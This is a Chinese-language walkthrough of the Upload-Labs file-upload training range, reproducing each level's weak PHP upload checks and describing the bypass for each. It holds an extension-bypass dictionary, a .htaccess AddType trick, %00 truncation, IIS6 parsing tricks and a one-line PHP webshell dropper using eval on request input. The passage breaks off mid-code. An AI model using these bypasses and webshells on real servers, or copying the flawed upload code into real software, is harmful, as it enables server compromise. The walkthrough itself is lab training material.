-
-
【封神台】Upload-Labs wp
-
发表于: 2021-8-5 13:45 1700
-
前言
- 掌控安全里面的靶场upload-labs,练练手!
- 环境:http://59.63.200.79:8016/
pass-01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | function checkFile() { var file = document.getElementsByName( 'upload_file' )[ 0 ].value; if ( file = = null || file = = "") { alert( "请选择要上传的文件!" ); return false; } / / 定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif" ; / / 提取上传文件的类型 var ext_name = file .substring( file .lastIndexOf( "." )); / / 判断上传文件类型是否允许上传 if (allow_ext.indexOf(ext_name + "|" ) = = - 1 ) { var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name; alert(errMsg); return false; } } |
- 没有对文件进行限制抓包改,需要注意一点的就是图片马多生成几个试吧,有的图片不太行
pass-02
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { if (($_FILES[ 'upload_file' ][ 'type' ] = = 'image/jpeg' ) || ($_FILES[ 'upload_file' ][ 'type' ] = = 'image/png' ) || ($_FILES[ 'upload_file' ][ 'type' ] = = 'image/gif' )) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . $_FILES[ 'upload_file' ][ 'name' ]; $is_upload = true; } } else { $msg = '文件类型不正确,请重新上传!' ; } } else { $msg = $UPLOAD_ADDR. '文件夹不存在,请手工创建!' ; } } |
- 只限制了content-type,并没有限制你改后缀名,和上题一样做法
pass-03
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( '.asp' , '.aspx' , '.php' , '.jsp' ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_name = deldot($file_name); / / 删除文件名末尾的点 $file_ext = strrchr($file_name, '.' ); $file_ext = strtolower($file_ext); / / 转换为小写 $file_ext = str_ireplace( '::$DATA' , '', $file_ext); / / 去除字符串::$DATA $file_ext = trim($file_ext); / / 收尾去空 if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR. '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ]; $is_upload = true; } } else { $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 过滤了几个,可以用其他试试phtml、php3、php.a、shtml,提示:如果是asp的就可以用cer、asa、cdx等
pass-04
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( ".php" , ".php5" , ".php4" , ".php3" , ".php2" , "php1" , ".html" , ".htm" , ".phtml" , ".pHp" , ".pHp5" , ".pHp4" , ".pHp3" , ".pHp2" , "pHp1" , ".Html" , ".Htm" , ".pHtml" , ".jsp" , ".jspa" , ".jspx" , ".jsw" , ".jsv" , ".jspf" , ".jtml" , ".jSp" , ".jSpx" , ".jSpa" , ".jSw" , ".jSv" , ".jSpf" , ".jHtml" , ".asp" , ".aspx" , ".asa" , ".asax" , ".ascx" , ".ashx" , ".asmx" , ".cer" , ".aSp" , ".aSpx" , ".aSa" , ".aSax" , ".aScx" , ".aShx" , ".aSmx" , ".cEr" , ".sWf" , ".swf" ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_name = deldot($file_name); / / 删除文件名末尾的点 $file_ext = strrchr($file_name, '.' ); $file_ext = strtolower($file_ext); / / 转换为小写 $file_ext = str_ireplace( '::$DATA' , '', $file_ext); / / 去除字符串::$DATA $file_ext = trim($file_ext); / / 收尾去空 if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . $_FILES[ 'upload_file' ][ 'name' ]; $is_upload = true; } } else { $msg = '此文件不允许上传!' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 基本上都过滤了,用.htaccess文件绕过吧
- 这是解析漏洞 只有apache才有。
- .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。
- 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
- 这个漏洞的原理就是服务器没有过滤htaccess文件的上传,而htaccess文件上传后,当前目录就会按照这个配置文件里面的内容执行。
1 | AddType application / x - httpd - php .png |
pass-05
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( ".php" , ".php5" , ".php4" , ".php3" , ".php2" , ".html" , ".htm" , ".phtml" , ".pHp" , ".pHp5" , ".pHp4" , ".pHp3" , ".pHp2" , ".Html" , ".Htm" , ".pHtml" , ".jsp" , ".jspa" , ".jspx" , ".jsw" , ".jsv" , ".jspf" , ".jtml" , ".jSp" , ".jSpx" , ".jSpa" , ".jSw" , ".jSv" , ".jSpf" , ".jHtml" , ".asp" , ".aspx" , ".asa" , ".asax" , ".ascx" , ".ashx" , ".asmx" , ".cer" , ".aSp" , ".aSpx" , ".aSa" , ".aSax" , ".aScx" , ".aShx" , ".aSmx" , ".cEr" , ".sWf" , ".swf" , ".htaccess" ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_name = deldot($file_name); / / 删除文件名末尾的点 $file_ext = strrchr($file_name, '.' ); $file_ext = str_ireplace( '::$DATA' , '', $file_ext); / / 去除字符串::$DATA $file_ext = trim($file_ext); / / 首尾去空 if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 过滤了一堆,但是有的大小写没过滤完整,拿出字典看看,用PhP试试
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 | phtml php php3 php4 php5 inc pHtml pHp pHp3 pHp4 pHp5 iNc iNc % 00 iNc % 20 % 20 % 20 iNc % 20 % 20 % 20. .. % 20. % 20. . iNc...... inc % 00 inc % 20 % 20 % 20 inc % 20 % 20 % 20. .. % 20. % 20. . inc...... pHp % 00 pHp % 20 % 20 % 20 pHp % 20 % 20 % 20. .. % 20. % 20. . pHp...... pHp3 % 00 pHp3 % 20 % 20 % 20 pHp3 % 20 % 20 % 20. .. % 20. % 20. . pHp3...... pHp4 % 00 pHp4 % 20 % 20 % 20 pHp4 % 20 % 20 % 20. .. % 20. % 20. . pHp4...... pHp5 % 00 pHp5 % 20 % 20 % 20 pHp5 % 20 % 20 % 20. .. % 20. % 20. . pHp5...... pHtml % 00 pHtml % 20 % 20 % 20 pHtml % 20 % 20 % 20. .. % 20. % 20. . pHtml...... php % 00 php % 20 % 20 % 20 php % 20 % 20 % 20. .. % 20. % 20. . php...... php3 % 00 php3 % 20 % 20 % 20 php3 % 20 % 20 % 20. .. % 20. % 20. . php3...... php4 % 00 php4 % 20 % 20 % 20 php4 % 20 % 20 % 20. .. % 20. % 20. . php4...... php5 % 00 php5 % 20 % 20 % 20 php5 % 20 % 20 % 20. .. % 20. % 20. . php5...... phtml % 00 phtml % 20 % 20 % 20 phtml % 20 % 20 % 20. .. % 20. % 20. . phtml...... |
pass-06
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( ".php" , ".php5" , ".php4" , ".php3" , ".php2" , ".html" , ".htm" , ".phtml" , ".pHp" , ".pHp5" , ".pHp4" , ".pHp3" , ".pHp2" , ".Html" , ".Htm" , ".pHtml" , ".jsp" , ".jspa" , ".jspx" , ".jsw" , ".jsv" , ".jspf" , ".jtml" , ".jSp" , ".jSpx" , ".jSpa" , ".jSw" , ".jSv" , ".jSpf" , ".jHtml" , ".asp" , ".aspx" , ".asa" , ".asax" , ".ascx" , ".ashx" , ".asmx" , ".cer" , ".aSp" , ".aSpx" , ".aSa" , ".aSax" , ".aScx" , ".aShx" , ".aSmx" , ".cEr" , ".sWf" , ".swf" , ".htaccess" ); $file_name = $_FILES[ 'upload_file' ][ 'name' ]; $file_name = deldot($file_name); / / 删除文件名末尾的点 $file_ext = strrchr($file_name, '.' ); $file_ext = strtolower($file_ext); / / 转换为小写 $file_ext = str_ireplace( '::$DATA' , '', $file_ext); / / 去除字符串::$DATA if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 过滤的比较全面就是没有去空格的函数,提示也说了空格绕过
pass-07
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( ".php" , ".php5" , ".php4" , ".php3" , ".php2" , ".html" , ".htm" , ".phtml" , ".pHp" , ".pHp5" , ".pHp4" , ".pHp3" , ".pHp2" , ".Html" , ".Htm" , ".pHtml" , ".jsp" , ".jspa" , ".jspx" , ".jsw" , ".jsv" , ".jspf" , ".jtml" , ".jSp" , ".jSpx" , ".jSpa" , ".jSw" , ".jSv" , ".jSpf" , ".jHtml" , ".asp" , ".aspx" , ".asa" , ".asax" , ".ascx" , ".ashx" , ".asmx" , ".cer" , ".aSp" , ".aSpx" , ".aSa" , ".aSax" , ".aScx" , ".aShx" , ".aSmx" , ".cEr" , ".sWf" , ".swf" , ".htaccess" ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_ext = strrchr($file_name, '.' ); $file_ext = strtolower($file_ext); / / 转换为小写 $file_ext = str_ireplace( '::$DATA' , '', $file_ext); / / 去除字符串::$DATA $file_ext = trim($file_ext); / / 首尾去空 if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 去了空格,过滤完美,提示说文件后缀点绕过,就在php后面加个.让他无法解析,就可以绕过了
pass-08
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( ".php" , ".php5" , ".php4" , ".php3" , ".php2" , ".html" , ".htm" , ".phtml" , ".pHp" , ".pHp5" , ".pHp4" , ".pHp3" , ".pHp2" , ".Html" , ".Htm" , ".pHtml" , ".jsp" , ".jspa" , ".jspx" , ".jsw" , ".jsv" , ".jspf" , ".jtml" , ".jSp" , ".jSpx" , ".jSpa" , ".jSw" , ".jSv" , ".jSpf" , ".jHtml" , ".asp" , ".aspx" , ".asa" , ".asax" , ".ascx" , ".ashx" , ".asmx" , ".cer" , ".aSp" , ".aSpx" , ".aSa" , ".aSax" , ".aScx" , ".aShx" , ".aSmx" , ".cEr" , ".sWf" , ".swf" , ".htaccess" ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_name = deldot($file_name); / / 删除文件名末尾的点 $file_ext = strrchr($file_name, '.' ); $file_ext = strtolower($file_ext); / / 转换为小写 $file_ext = trim($file_ext); / / 首尾去空 if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 和前面的代码有点不同,没有去掉::$DATA字符流windows文件流绕过
- 执行的时候不带::$DATA就行了
pass-09
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( ".php" , ".php5" , ".php4" , ".php3" , ".php2" , ".html" , ".htm" , ".phtml" , ".pHp" , ".pHp5" , ".pHp4" , ".pHp3" , ".pHp2" , ".Html" , ".Htm" , ".pHtml" , ".jsp" , ".jspa" , ".jspx" , ".jsw" , ".jsv" , ".jspf" , ".jtml" , ".jSp" , ".jSpx" , ".jSpa" , ".jSw" , ".jSv" , ".jSpf" , ".jHtml" , ".asp" , ".aspx" , ".asa" , ".asax" , ".ascx" , ".ashx" , ".asmx" , ".cer" , ".aSp" , ".aSpx" , ".aSa" , ".aSax" , ".aScx" , ".aShx" , ".aSmx" , ".cEr" , ".sWf" , ".swf" , ".htaccess" ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_name = deldot($file_name); / / 删除文件名末尾的点 $file_ext = strrchr($file_name, '.' ); $file_ext = strtolower($file_ext); / / 转换为小写 $file_ext = str_ireplace( '::$DATA' , '', $file_ext); / / 去除字符串::$DATA $file_ext = trim($file_ext); / / 首尾去空 if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $_FILES[ 'upload_file' ][ 'name' ])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 黑名单机制+删除掉文件名最后一个点(若有的话),判断最后一位是不是点,字符串首尾去空。根据代码反向思考构造可以绕过的后缀为.php.空格.
- 所以用.php.空格.就会删掉后面的点和去空格函数去掉但是还有一个.就形成绕过
pass-10
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( "php" , "php5" , "php4" , "php3" , "php2" , "html" , "htm" , "phtml" , "jsp" , "jspa" , "jspx" , "jsw" , "jsv" , "jspf" , "jtml" , "asp" , "aspx" , "asa" , "asax" , "ascx" , "ashx" , "asmx" , "cer" , "swf" , "htaccess" ); $file_name = trim($_FILES[ 'upload_file' ][ 'name' ]); $file_name = str_ireplace($deny_ext,"", $file_name); if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $UPLOAD_ADDR . '/' . $file_name)) { $img_path = $UPLOAD_ADDR . '/' .$file_name; $is_upload = true; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
- 解析:只是单纯的对第一次发现php进行删除,但是构造一个双写php被删了之后还是可以绕过,例如pphphp=php,检测到php就删了但是又构成了一个php
pass-11
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ $ext_arr = array( 'jpg' , 'png' , 'gif' ); $file_ext = substr($_FILES[ 'upload_file' ][ 'name' ],strrpos($_FILES[ 'upload_file' ][ 'name' ], "." ) + 1 ); if (in_array($file_ext,$ext_arr)){ $temp_file = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $img_path = $_GET[ 'save_path' ]. "/" .rand( 10 , 99 ).date( "YmdHis" ). "." .$file_ext; if (move_uploaded_file($temp_file,$img_path)){ $is_upload = true; } else { $msg = '上传失败!' ; } } else { $msg = "只允许上传.jpg|.png|.gif类型文件!" ; } } |
- 对文件名进行了随机,提示%00截断
pass-12
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ $ext_arr = array( 'jpg' , 'png' , 'gif' ); $file_ext = substr($_FILES[ 'upload_file' ][ 'name' ],strrpos($_FILES[ 'upload_file' ][ 'name' ], "." ) + 1 ); if (in_array($file_ext,$ext_arr)){ $temp_file = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $img_path = $_POST[ 'save_path' ]. "/" .rand( 10 , 99 ).date( "YmdHis" ). "." .$file_ext; if (move_uploaded_file($temp_file,$img_path)){ $is_upload = true; } else { $msg = "上传失败" ; } } else { $msg = "只允许上传.jpg|.png|.gif类型文件!" ; } } |
pass-13
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | function getReailFileType($filename){ $ file = fopen($filename, "rb" ); $ bin = fread($ file , 2 ); / / 只读 2 字节 fclose($ file ); $strInfo = @unpack( "C2chars" , $ bin ); $typeCode = intval($strInfo[ 'chars1' ].$strInfo[ 'chars2' ]); $fileType = ''; switch($typeCode){ case 255216 : $fileType = 'jpg' ; break ; case 13780 : $fileType = 'png' ; break ; case 7173 : $fileType = 'gif' ; break ; default: $fileType = 'unknown' ; } return $fileType; } $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ $temp_file = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $file_type = getReailFileType($temp_file); if ($file_type = = 'unknown' ){ $msg = "文件未知,上传失败!" ; } else { $img_path = $UPLOAD_ADDR. "/" .rand( 10 , 99 ).date( "YmdHis" ). "." .$file_type; if (move_uploaded_file($temp_file,$img_path)){ $is_upload = true; } else { $msg = "上传失败" ; } } } |
- 检查图片前两个字节直接合一个图片马解析漏洞,多试几个图片吧,有的图片过大或者过小里面包含着特殊内容的,都可以pass
pass-14
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | function isImage($filename){ $types = '.jpeg|.png|.gif' ; if (file_exists($filename)){ $info = getimagesize($filename); $ext = image_type_to_extension($info[ 2 ]); if (stripos($types,$ext)){ return $ext; } else { return false; } } else { return false; } } $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ $temp_file = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $res = isImage($temp_file); if (!$res){ $msg = "文件未知,上传失败!" ; } else { $img_path = $UPLOAD_ADDR. "/" .rand( 10 , 99 ).date( "YmdHis" ).$res; if (move_uploaded_file($temp_file,$img_path)){ $is_upload = true; } else { $msg = "上传失败" ; } } } |
- 只是换了个getimagesize的函数来判断图片类型,但是依旧是nginx的解析漏洞
pass-15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | function isImage($filename){ / / 需要开启php_exif模块 $image_type = exif_imagetype($filename); switch ($image_type) { case IMAGETYPE_GIF: return "gif" ; break ; case IMAGETYPE_JPEG: return "jpg" ; break ; case IMAGETYPE_PNG: return "png" ; break ; default: return false; break ; } } $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ $temp_file = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $res = isImage($temp_file); if (!$res){ $msg = "文件未知,上传失败!" ; } else { $img_path = $UPLOAD_ADDR. "/" .rand( 10 , 99 ).date( "YmdHis" ). "." .$res; if (move_uploaded_file($temp_file,$img_path)){ $is_upload = true; } else { $msg = "上传失败" ; } } } |
- 换了个模块,不影响我们传马,解析
pass-16
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ / / 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES[ 'upload_file' ][ 'name' ]; $filetype = $_FILES[ 'upload_file' ][ 'type' ]; $tmpname = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $target_path = $UPLOAD_ADDR.basename($filename); / / 获得上传文件的扩展名 $fileext = substr(strrchr($filename, "." ), 1 ); / / 判断文件后缀与类型,合法才进行上传操作 if (($fileext = = "jpg" ) && ($filetype = = "image/jpeg" )){ if (move_uploaded_file($tmpname,$target_path)) { / / 使用上传的图片生成新的图片 $im = imagecreatefromjpeg($target_path); if ($im = = false){ $msg = "该文件不是jpg格式的图片!" ; } else { / / 给新图片指定文件名 srand(time()); $newfilename = strval(rand()). ".jpg" ; $newimagepath = $UPLOAD_ADDR.$newfilename; imagejpeg($im,$newimagepath); / / 显示二次渲染后的图片(使用用户上传图片生成的新图片) $img_path = $UPLOAD_ADDR.$newfilename; unlink($target_path); $is_upload = true; } } else { $msg = "上传失败!" ; } } else if (($fileext = = "png" ) && ($filetype = = "image/png" )){ if (move_uploaded_file($tmpname,$target_path)) { / / 使用上传的图片生成新的图片 $im = imagecreatefrompng($target_path); if ($im = = false){ $msg = "该文件不是png格式的图片!" ; } else { / / 给新图片指定文件名 srand(time()); $newfilename = strval(rand()). ".png" ; $newimagepath = $UPLOAD_ADDR.$newfilename; imagepng($im,$newimagepath); / / 显示二次渲染后的图片(使用用户上传图片生成的新图片) $img_path = $UPLOAD_ADDR.$newfilename; unlink($target_path); $is_upload = true; } } else { $msg = "上传失败!" ; } } else if (($fileext = = "gif" ) && ($filetype = = "image/gif" )){ if (move_uploaded_file($tmpname,$target_path)) { / / 使用上传的图片生成新的图片 $im = imagecreatefromgif($target_path); if ($im = = false){ $msg = "该文件不是gif格式的图片!" ; } else { / / 给新图片指定文件名 srand(time()); $newfilename = strval(rand()). ".gif" ; $newimagepath = $UPLOAD_ADDR.$newfilename; imagegif($im,$newimagepath); / / 显示二次渲染后的图片(使用用户上传图片生成的新图片) $img_path = $UPLOAD_ADDR.$newfilename; unlink($target_path); $is_upload = true; } } else { $msg = "上传失败!" ; } } else { $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!" ; } } |
- 对图片进行二次渲染,先上传一个图片,再对比原来的图片,查看渲染的主要位置,然后再不会被渲染的位置加上一句话木马
pass-17和pass-18条件竞争
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])){ $ext_arr = array( 'jpg' , 'png' , 'gif' ); $file_name = $_FILES[ 'upload_file' ][ 'name' ]; $temp_file = $_FILES[ 'upload_file' ][ 'tmp_name' ]; $file_ext = substr($file_name,strrpos($file_name, "." ) + 1 ); $upload_file = $UPLOAD_ADDR . '/' . $file_name; if (move_uploaded_file($temp_file, $upload_file)){ if (in_array($file_ext,$ext_arr)){ $img_path = $UPLOAD_ADDR . '/' . rand( 10 , 99 ).date( "YmdHis" ). "." .$file_ext; rename($upload_file, $img_path); $is_upload = true; } else { $msg = "只允许上传.jpg|.png|.gif类型文件!" ; unlink($upload_file); } } else { $msg = '上传失败!' ; } } |
- 利用php写的函数来进行强制访问生成
1 | <?php file_put_contents( 'shell.php' , '<?php eval($_REQUEST[2]);?>' ) ?> |
pass-19
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | $is_upload = false; $msg = null; if (isset($_POST[ 'submit' ])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array( "php" , "php5" , "php4" , "php3" , "php2" , "html" , "htm" , "phtml" , "pht" , "jsp" , "jspa" , "jspx" , "jsw" , "jsv" , "jspf" , "jtml" , "asp" , "aspx" , "asa" , "asax" , "ascx" , "ashx" , "asmx" , "cer" , "swf" , "htaccess" ); $file_name = $_POST[ 'save_name' ]; $file_ext = pathinfo($file_name,PATHINFO_EXTENSION); if (!in_array($file_ext,$deny_ext)) { $img_path = $UPLOAD_ADDR . '/' .$file_name; if (move_uploaded_file($_FILES[ 'upload_file' ][ 'tmp_name' ], $img_path)) { $is_upload = true; } else { $msg = '上传失败!' ; } } else { $msg = '禁止保存为该类型文件!' ; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!' ; } } |
绕过方法:控制文件名字、或者控制文件夹的名字。
- apache解析漏洞,保存为phpinfo.php.xxx
- windows文件存储特性,加 .和空格
- 00截断
- /.,move_uploaded_file会忽略掉文件末尾的/.(和windows存储特性不同,这个是函数的特性)。
- 通过BP 抓包,然后修改数据包 :upload-20.php%00.jpg 在文件后缀加上jep , 然后用 %00 进行截断。
- 上传.php文件,保存为.jpg文件,上传成功;上传.jpg文件,保存为.php文件,上传失败。这样看来校验的应该是保存的文件名,那么又需要看是白名单校验还是黑名单校验,还是上传.php文件,随便输入一个保存的文件名,随便输入一个后缀名,或者是不写后缀名,保存成功。说明是黑名单验证。那黑名单验证就有太多的绕过方式了。
pass-20
IIS6.0解析漏洞(一):
IIS6.0解析漏洞分两种
1、目录解析
以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。2、文件解析
.asp;.jpg 像这种畸形文件名在“;”后面的直接被忽略,也就是说当成 .asp文件执行。
IIS6.0 默认的可执行文件除了asp还包含这三种 .asa .cer *.cdx
- 可以直接菜刀连asp
pass-21
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | $allowedExts = array( "gif" , "jpeg" , "jpg" , "png" ); $temp = explode( "." , $_FILES[ "file" ][ "name" ]); echo $_FILES[ "file" ][ "size" ]; $extension = end($temp); / / 获取文件后缀名 if ((($_FILES[ "file" ][ "type" ] = = "image/gif" ) || ($_FILES[ "file" ][ "type" ] = = "image/jpeg" ) || ($_FILES[ "file" ][ "type" ] = = "image/jpg" ) || ($_FILES[ "file" ][ "type" ] = = "image/pjpeg" ) || ($_FILES[ "file" ][ "type" ] = = "image/x-png" ) || ($_FILES[ "file" ][ "type" ] = = "image/png" )) && ($_FILES[ "file" ][ "size" ] < 204800 ) / / 小于 200 kb && in_array($extension, $allowedExts)) { if ($_FILES[ "file" ][ "error" ] > 0 ) { echo "错误:: " . $_FILES[ "file" ][ "error" ] . ""; } else { echo "上传文件名: " . $_FILES[ "file" ][ "name" ] . ""; echo "文件类型: " . $_FILES[ "file" ][ "type" ] . ""; echo "文件大小: " . ($_FILES[ "file" ][ "size" ] / 1024 ) . " kB" ; if (file_exists( "./b/image/" . $_FILES[ "file" ][ "name" ])) { echo $_FILES[ "file" ][ "name" ] . " 文件已经存在。 " ; } else { / / 如果 upload 目录不存在该文件则将文件上传到 upload 目录下 $ret = move_uploaded_file($_FILES[ "file" ][ "tmp_name" ], "image/" . $_FILES[ "file" ][ "name" ]); echo "文件存储在: " . "./b/image/" . $_FILES[ "file" ][ "name" ]; echo ""; } } } else { echo "非法的文件格式" ; } |
- 白名单机制不影响;来截断进行getshell
pass-22
- 直接上传一个图片,解析
pass-23
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | $allowedExts = array( "jpg" ); $time = time(); $temp = explode( "." , $_FILES[ "file" ][ "name" ]); echo $_FILES[ "file" ][ "size" ]; $extension = end($temp); / / 获取文件后缀名 if ((($_FILES[ "file" ][ "type" ] = = "image/gif" ) || ($_FILES[ "file" ][ "type" ] = = "image/jpeg" ) || ($_FILES[ "file" ][ "type" ] = = "image/jpg" ) || ($_FILES[ "file" ][ "type" ] = = "image/pjpeg" ) || ($_FILES[ "file" ][ "type" ] = = "image/x-png" ) || ($_FILES[ "file" ][ "type" ] = = "image/png" )) && ($_FILES[ "file" ][ "size" ] < 204800 ) / / 小于 200 kb && in_array($extension, $allowedExts)) { if ($_FILES[ "file" ][ "error" ] > 0 ) { echo "错误:: " . $_FILES[ "file" ][ "error" ] . ""; } else { echo "上传文件名: " . $_FILES[ "file" ][ "name" ] . ""; echo "文件类型: " . $_FILES[ "file" ][ "type" ] . ""; echo "文件大小: " . ($_FILES[ "file" ][ "size" ] / 1024 ) . " kB" ; if (file_exists( "C:/Inetpub/wwwroot/c/image/a.asp/" .$time. ".jpg" )) { echo $_FILES[ "file" ][ "name" ] . " 文件已经存在。 " ; } else { / / 如果 upload 目录不存在该文件则将文件上传到 upload 目录下 $ret = move_uploaded_file($_FILES[ "file" ][ "tmp_name" ], "image/a.asp/" .$time. ".jpg" ); echo "文件存储在: " . "./c/image/a.asp/" .$time. ".jpg" ; echo ""; } } } else { echo 